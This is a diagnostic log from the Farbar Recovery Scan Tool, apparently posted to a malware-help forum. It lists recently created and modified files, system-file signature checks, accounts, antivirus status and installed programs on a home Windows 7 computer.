2016-11-08 15:57 - 2016-10-07 09:32 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:18 - 04000488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2016-11-08 15:57 - 2016-10-07 09:18 - 03944680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2016-11-08 15:57 - 2016-10-07 09:15 - 01314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 02291712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSVidCtl.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00581632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\asycfilt.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 09:04 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2016-11-08 15:57 - 2016-10-07 09:04 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2016-11-08 15:57 - 2016-10-07 09:04 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2016-11-08 15:57 - 2016-10-07 09:01 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2016-11-08 15:57 - 2016-10-07 09:00 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2016-11-08 15:57 - 2016-10-07 08:56 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2016-11-08 15:57 - 2016-10-07 08:50 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2016-11-08 15:57 - 2016-10-07 08:50 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2016-11-08 15:57 - 2016-10-07 08:50 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2016-11-08 15:57 - 2016-10-07 08:50 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2016-11-08 15:57 - 2016-10-07 08:49 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 08:49 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 08:49 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2016-11-08 15:57 - 2016-10-07 08:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2016-11-08 15:57 - 2016-10-05 08:54 - 00090112 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bowser.sys
2016-11-08 15:57 - 2016-09-15 08:56 - 00041984 _____ (Microsoft Corporation) C:\Windows\system32\UtcResources.dll
2016-11-08 15:57 - 2016-09-13 09:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2016-11-08 15:57 - 2016-09-13 09:11 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2016-11-08 15:57 - 2016-09-09 12:20 - 00756736 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2016-11-08 15:57 - 2016-09-09 12:00 - 00497152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32spl.dll
2016-11-08 15:57 - 2016-08-22 10:19 - 01386496 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2016-11-05 13:11 - 2016-11-05 13:12 - 00045056 ___SH C:\Users\Public\Documents\Thumbs.db
2016-11-05 10:34 - 2016-11-12 07:38 - 00003180 _____ C:\Windows\System32\Tasks\HPCeeScheduleForDale
2016-11-05 10:34 - 2016-11-12 07:38 - 00000328 _____ C:\Windows\Tasks\HPCeeScheduleForDale.job
2016-11-05 10:34 - 2016-11-05 10:34 - 00000000 ____D C:\Users\Dale\AppData\Local\HP_Development_Company,_L
2016-11-04 18:50 - 2016-11-04 18:50 - 00001115 _____ C:\Users\Public\Desktop\HP Photo Creations.lnk
2016-11-04 18:50 - 2016-11-04 18:50 - 00000000 ____D C:\ProgramData\HP Photo Creations
2016-11-04 18:50 - 2016-11-04 18:50 - 00000000 ____D C:\Program Files (x86)\HP Photo Creations
2016-11-04 18:49 - 2016-11-04 18:49 - 00001976 _____ C:\Users\Public\Desktop\HP ePrinterCenter.lnk
2016-11-04 18:49 - 2016-11-04 18:49 - 00001321 _____ C:\ProgramData\Microsoft\Windows\Start Menu\HP Solution Center.lnk
2016-11-04 18:49 - 2016-11-04 18:49 - 00001315 _____ C:\Users\Public\Desktop\HP Solution Center.lnk
2016-11-04 18:49 - 2016-11-04 18:49 - 00000000 ____D C:\ProgramData\HP Product Assistant
2016-11-04 18:48 - 2016-11-08 17:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP
2016-11-04 18:47 - 2016-11-04 18:54 - 00206371 _____ C:\Windows\hpoins49.dat
2016-11-04 18:47 - 2010-04-23 16:51 - 00001241 ____N C:\Windows\hpomdl49.dat
2016-11-04 18:36 - 2016-11-04 18:36 - 00000000 ____D C:\Users\Dale\AppData\Roaming\Hewlett-Packard
2016-11-04 18:28 - 2016-11-04 18:28 - 00002243 _____ C:\Users\Public\Desktop\HP Support Assistant.lnk
2016-11-04 18:28 - 2016-11-04 18:28 - 00000000 ____D C:\System.sav
2016-11-04 18:28 - 2016-11-04 18:28 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP Help and Support
2016-11-04 18:27 - 2016-11-04 18:27 - 00000000 ____D C:\Users\Dale\AppData\Roaming\hpqLog
2016-11-01 18:47 - 2016-11-01 18:47 - 00000000 ____D C:\Users\Public\Juniper Networks
2016-11-01 18:47 - 2016-11-01 18:47 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pulse Secure
2016-11-01 18:47 - 2015-10-22 16:51 - 00592216 _____ (Pulse Secure, LLC) C:\Windows\system32\dsNcSmartCardProv.dll
2016-11-01 18:47 - 2015-10-22 16:51 - 00421720 _____ (Pulse Secure, LLC) C:\Windows\system32\dsNcCredProv.dll
2016-11-01 18:46 - 2016-11-08 17:54 - 00000000 ____D C:\Users\Dale\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pulse Secure
2016-11-01 18:46 - 2016-11-01 18:47 - 00000000 ____D C:\Program Files (x86)\Juniper Networks
2016-11-01 18:44 - 2016-11-01 18:44 - 02074792 _____ (Pulse Secure, LLC) C:\Users\Dale\Downloads\JuniperSetupClientInstaller (7).exe
2016-11-01 18:42 - 2016-11-08 17:54 - 00000000 ____D C:\Users\Dale\AppData\Roaming\Juniper Networks
2016-11-01 18:42 - 2016-11-01 18:42 - 02074792 _____ (Pulse Secure, LLC) C:\Users\Dale\Downloads\JuniperSetupClientInstaller (6).exe
2016-11-01 18:42 - 2016-11-01 18:42 - 00000000 ____D C:\Users\Dale\AppData\Local\Juniper Networks
2016-11-01 18:41 - 2016-11-01 18:41 - 02074792 _____ (Pulse Secure, LLC) C:\Users\Dale\Downloads\JuniperSetupClientInstaller (5).exe
2016-11-01 18:40 - 2016-11-01 18:40 - 02074792 _____ (Pulse Secure, LLC) C:\Users\Dale\Downloads\JuniperSetupClientInstaller (4).exe
2016-10-31 18:14 - 2016-10-25 20:33 - 00621708 _____ C:\Users\Public\Documents\First Free Contact Directory Feb 2016.pdf
2016-10-28 15:10 - 2016-10-28 15:10 - 00000000 ____D C:\Windows\pss
2016-10-24 18:17 - 2016-10-24 18:17 - 00000000 ____D C:\Users\Dale\Desktop\Log
2016-10-18 20:09 - 2016-10-18 20:09 - 01141650 _____ C:\Users\Public\Documents\How-to-Achieve-a-Rich-Mindset.pdf
2016-10-15 19:00 - 2016-10-15 19:00 - 00003216 _____ C:\Windows\System32\Tasks\Norton WSC Integration
2016-10-15 11:50 - 2016-11-11 20:38 - 00000000 ____D C:\Users\Public\Documents\For Brad 2
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-11-12 17:31 - 2016-07-28 15:26 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d1e916bd037ff2.job
2016-11-12 17:30 - 2009-07-13 22:45 - 00022768 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-11-12 17:30 - 2009-07-13 22:45 - 00022768 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-11-12 17:00 - 2016-01-19 20:33 - 50839694 _____ C:\Users\Dale\QDATA.QDF
2016-11-12 16:48 - 2016-07-12 14:44 - 00000556 _____ C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-2722837513-1420934957-2528714982-1000.job
2016-11-12 16:31 - 2016-07-28 15:26 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d1e916bc7e32e3.job
2016-11-12 16:23 - 2009-07-13 23:13 - 00781298 _____ C:\Windows\system32\PerfStringBackup.INI
2016-11-12 16:23 - 2009-07-13 21:20 - 00000000 ____D C:\Windows\inf
2016-11-12 16:13 - 2016-01-20 22:06 - 03436048 _____ C:\Users\Dale\QDATAOFXLOG.DAT
2016-11-12 15:58 - 2016-01-17 19:57 - 00000000 ____D C:\Users\Dale\Documents\Outlook Files
2016-11-12 15:42 - 2016-07-12 14:44 - 00000652 _____ C:\Windows\Tasks\G2MUploadTask-S-1-5-21-2722837513-1420934957-2528714982-1000.job
2016-11-12 11:54 - 2016-01-19 17:21 - 00000000 ____D C:\Program Files (x86)\Quicken
2016-11-12 10:18 - 2009-07-13 21:20 - 00000000 ____D C:\Windows\rescache
2016-11-12 07:24 - 2016-01-24 15:54 - 00000286 _____ C:\Windows\Tasks\NUAutoUpdate.job
2016-11-12 07:24 - 2009-07-13 23:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-11-11 22:37 - 2016-01-09 11:19 - 00000000 ____D C:\Users\Dale\AppData\Local\Google
2016-11-11 18:47 - 2016-01-13 20:35 - 00000000 ____D C:\Windows\System32\Tasks\Remediation
2016-11-10 23:02 - 2016-01-19 21:10 - 00000000 ____D C:\Users\Dale\BACKUP
2016-11-08 23:22 - 2016-01-17 20:08 - 00000000 ____D C:\Users\Dale\Desktop\Dale's personal
2016-11-08 19:25 - 2009-07-13 23:32 - 00000000 ____D C:\Windows\Downloaded Program Files
2016-11-08 19:23 - 2009-07-13 21:20 - 00000000 ____D C:\Windows\system32\NDF
2016-11-08 19:16 - 2009-07-13 22:45 - 00448416 _____ C:\Windows\system32\FNTCACHE.DAT
2016-11-08 18:22 - 2016-01-10 19:29 - 00000000 ____D C:\Windows\system32\MRT
2016-11-08 18:18 - 2016-01-10 19:28 - 141011376 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2016-11-08 18:02 - 2016-01-24 18:20 - 00000000 ____D C:\Users\Dale\AppData\Roaming\Norton Utilities 16
2016-11-08 18:02 - 2016-01-24 15:51 - 00000000 ____D C:\ProgramData\TEMP
2016-11-08 17:58 - 2016-01-11 16:47 - 00000000 ____D C:\Program Files (x86)\Adobe
2016-11-08 17:56 - 2016-01-09 08:46 - 00000000 ____D C:\Users\Dale
2016-11-08 17:54 - 2016-01-11 17:10 - 00000000 ____D C:\Program Files (x86)\HP
2016-11-08 17:54 - 2011-04-12 02:28 - 00000000 ___RD C:\Users\Public\Recorded TV
2016-11-08 17:54 - 2009-07-13 21:20 - 00000000 ____D C:\Windows\registration
2016-11-08 15:44 - 2016-01-24 15:54 - 00000278 _____ C:\Windows\Tasks\NUSchedule.job
2016-11-07 18:29 - 2016-03-13 20:38 - 00000000 ____D C:\Users\Dale\AppData\Local\CrashDumps
2016-11-05 12:53 - 2016-02-02 18:02 - 00000000 ____D C:\ProgramData\Hewlett-Packard
2016-11-05 12:53 - 2016-01-11 17:06 - 00000000 ____D C:\Windows\System32\Tasks\Hewlett-Packard
2016-11-05 12:47 - 2009-07-13 20:34 - 96993280 _____ C:\Windows\system32\config\software.rmbak
2016-11-05 12:47 - 2009-07-13 20:34 - 00524288 _____ C:\Windows\system32\config\default.rmbak
2016-11-04 18:53 - 2016-01-09 11:35 - 00115984 _____ C:\Users\Dale\AppData\Local\GDIPFONTCACHEV1.DAT
2016-11-04 18:53 - 2009-07-13 20:34 - 00000438 _____ C:\Windows\win.ini
2016-11-04 18:51 - 2016-01-11 17:13 - 00000000 ____D C:\Program Files (x86)\MSN Toolbar Installer
2016-11-04 18:50 - 2016-01-11 17:13 - 00000000 ____D C:\Users\Dale\AppData\Roaming\HpUpdate
2016-11-04 18:50 - 2016-01-11 17:09 - 00000000 ____D C:\ProgramData\HP
2016-11-04 18:45 - 2016-01-11 17:07 - 00000000 ____D C:\Users\Dale\Downloads\HP Downloads
2016-11-04 18:42 - 2016-01-11 17:07 - 00000000 ____D C:\Users\Dale\AppData\Local\Hewlett-Packard
2016-11-04 18:28 - 2016-01-11 17:06 - 00000000 ____D C:\Program Files (x86)\Hewlett-Packard
2016-11-04 18:28 - 2016-01-09 11:24 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-11-01 16:40 - 2016-07-12 14:44 - 00003676 _____ C:\Windows\System32\Tasks\G2MUploadTask-S-1-5-21-2722837513-1420934957-2528714982-1000
2016-11-01 16:40 - 2016-07-12 14:44 - 00003580 _____ C:\Windows\System32\Tasks\G2MUpdateTask-S-1-5-21-2722837513-1420934957-2528714982-1000
2016-11-01 16:32 - 2016-02-22 19:37 - 00002197 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-11-01 16:32 - 2016-02-22 19:37 - 00002185 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-10-28 16:27 - 2016-01-09 13:11 - 00000000 ____D C:\Users\Dale\AppData\Local\Adobe
2016-10-28 13:40 - 2016-10-12 15:35 - 00000000 ____D C:\Users\Dale\AppData\Local\NPE
2016-10-22 10:27 - 2016-01-17 20:11 - 00000000 ____D C:\Users\Dale\Desktop\Recipes
2016-10-15 19:06 - 2016-03-15 19:59 - 00000000 ____D C:\Windows\System32\Tasks\Norton Security
2016-10-15 19:00 - 2016-06-26 10:58 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton Security
2016-10-15 19:00 - 2016-01-10 04:40 - 00002292 _____ C:\Users\Public\Desktop\Norton Security.lnk
2016-10-15 19:00 - 2016-01-10 04:39 - 00000000 ____D C:\Windows\system32\Drivers\NSx64
2016-10-15 14:33 - 2016-09-28 19:52 - 00000000 ____D C:\Users\Dale\AppData\Local\e2f44a7
2016-10-15 13:33 - 2016-01-10 04:40 - 00100592 _____ (Symantec Corporation) C:\Windows\system32\Drivers\SYMEVENT64x86.SYS
2016-10-15 13:33 - 2016-01-10 04:40 - 00008319 _____ C:\Windows\system32\Drivers\SYMEVENT64x86.CAT
 
==================== Files in the root of some directories =======
 
2016-03-21 16:48 - 2016-09-24 19:33 - 3670016 _____ () C:\ProgramData\fcInstall.etl
2016-03-21 16:48 - 2016-09-24 19:33 - 0579312 _____ () C:\ProgramData\fcInstall.log
2016-05-15 13:23 - 2016-10-04 17:27 - 7340032 _____ () C:\ProgramData\fcUninstall.etl
2016-05-15 13:23 - 2016-10-04 17:27 - 0369837 _____ () C:\ProgramData\fcUninstall.log
2016-01-11 17:09 - 2016-11-08 17:49 - 0009510 _____ () C:\ProgramData\hpzinstall.log
2016-01-24 15:11 - 2016-02-06 10:07 - 0000469 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
 
Files to move or delete:
====================
C:\Users\Dale\QDATAOFXLOG.DAT
C:\Users\Dale\QDATAOFXOLD.DAT
 
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-11-06 08:52
 
==================== End of FRST.txt ============================
 
Here's the Addition.txt. :
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 12-11-2016
Ran by Dale (12-11-2016 17:37:36)
Running from C:\Users\Dale\Downloads
Windows 7 Professional Service Pack 1 (X64) (2016-01-09 14:46:25)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-2722837513-1420934957-2528714982-500 - Administrator - Disabled)
Dale (S-1-5-21-2722837513-1420934957-2528714982-1000 - Administrator - Enabled) => C:\Users\Dale
Guest (S-1-5-21-2722837513-1420934957-2528714982-501 - Limited - Enabled)
HomeGroupUser$ (S-1-5-21-2722837513-1420934957-2528714982-1002 - Limited - Enabled)
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Norton Security (Enabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Norton Security (Enabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}
FW: Norton Security (Enabled) {6BFC5632-188D-B806-D13E-C607121B42A0}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden
Adobe Flash Player 23 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 23.0.0.162 - Adobe Systems Incorporated)
AI Suite (HKLM-x32\...\{310BC5E2-31AF-49BB-904D-E71EB93645DC}) (Version: 2.00.02 - )
Asmedia ASM104x USB 3.0 Host Controller Driver (HKLM-x32\...\{E4FB0B39-C991-4EE7-95DD-1A1A7857D33D}) (Version: 1.16.2.0 - Asmedia Technology)
ASUS WebStorage (HKLM-x32\...\ASUS WebStorage) (Version: 3.0.94.193 - eCareme Technologies, Inc.)
ASUSUpdate (HKLM-x32\...\{587178E7-B1DF-494E-9838-FA4DD36E873C}) (Version: 7.18.03 - ASUSTeK Computer Inc.)
ATI Catalyst Install Manager (HKLM\...\{2A13EF26-4D68-B2D7-A486-DBBD2FDE366B}) (Version: 3.0.765.0 - ATI Technologies, Inc.)
BufferChm (x32 Version: 140.0.212.000 - Hewlett-Packard) Hidden
C310 (x32 Version: 140.0.304.000 - Hewlett-Packard) Hidden
ccc-core-static (x32 Version: 2010.0210.2206.39615 - ATI) Hidden
Cisco WebEx Meetings (HKLM-x32\...\ActiveTouchMeetingClient) (Version:  - Cisco WebEx LLC)
Coupon Printer for Windows (HKLM-x32\...\Coupon Printer for Windows5.0.0.0) (Version: 5.0.0.0 - Coupons.com Incorporated)
Destinations (x32 Version: 140.0.77.000 - Hewlett-Packard) Hidden
DeviceDiscovery (x32 Version: 140.0.212.000 - Hewlett-Packard) Hidden
EPU-4 Engine (HKLM-x32\...\{8F66047B-1AF3-40D9-80D7-106E2EDC2C2A}) (Version: 1.03.03 - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 54.0.2840.87 - Google Inc.)
Google Update Helper (x32 Version: 1.3.21.57 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
GoToMeeting 7.26.0.5808 (HKU\S-1-5-21-2722837513-1420934957-2528714982-1000\...\GoToMeeting) (Version: 7.26.0.5808 - CitrixOnline)
GPBaseService2 (x32 Version: 140.0.211.000 - Hewlett-Packard) Hidden
HP Customer Participation Program 14.0 (HKLM\...\HPExtendedCapabilities) (Version: 14.0 - HP)
HP Imaging Device Functions 14.0 (HKLM\...\HP Imaging Device Functions) (Version: 14.0 - HP)
